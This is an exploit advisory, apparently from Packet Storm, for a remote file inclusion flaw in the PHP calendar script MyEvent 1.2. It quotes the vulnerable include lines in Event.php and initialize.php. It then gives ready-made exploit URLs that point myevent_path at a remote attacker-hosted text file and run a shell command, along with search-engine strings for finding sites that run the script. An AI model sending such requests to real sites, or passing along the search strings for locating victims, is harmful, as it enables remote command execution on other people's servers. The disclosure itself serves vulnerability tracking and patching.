MyEvent v1.2 suffers from a remote code execution vulnerability in Event.php.
6548a9178fabe7b3ea795b487c78a672b84f26b2f3476f869e8059ab2501520eWebsite : http://mywebland.com/
Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php"
I. Remote Code Execution
This is script to very big high it bug being found.
"Event.php" remote code execution :
global $myevent_path;
include_once $myevent_path."includes/template.php";
$template = new Template($myevent_path."templates/") ;
$template->set_filenames(array(
'event' => 'event.tpl',
?>
Did you see the "myevent_path" :)
http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a
"İnitialize.php" Remote Code :
include $myevent_path."config.php";
include $myevent_path.$language;
include_once $myevent_path."includes/template.php" ;
$db = mysql_connect($host,$login,$password);
mysql_select_db($base,$db);
>
Yep now code
http://www.site.com/[path]/initialize.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed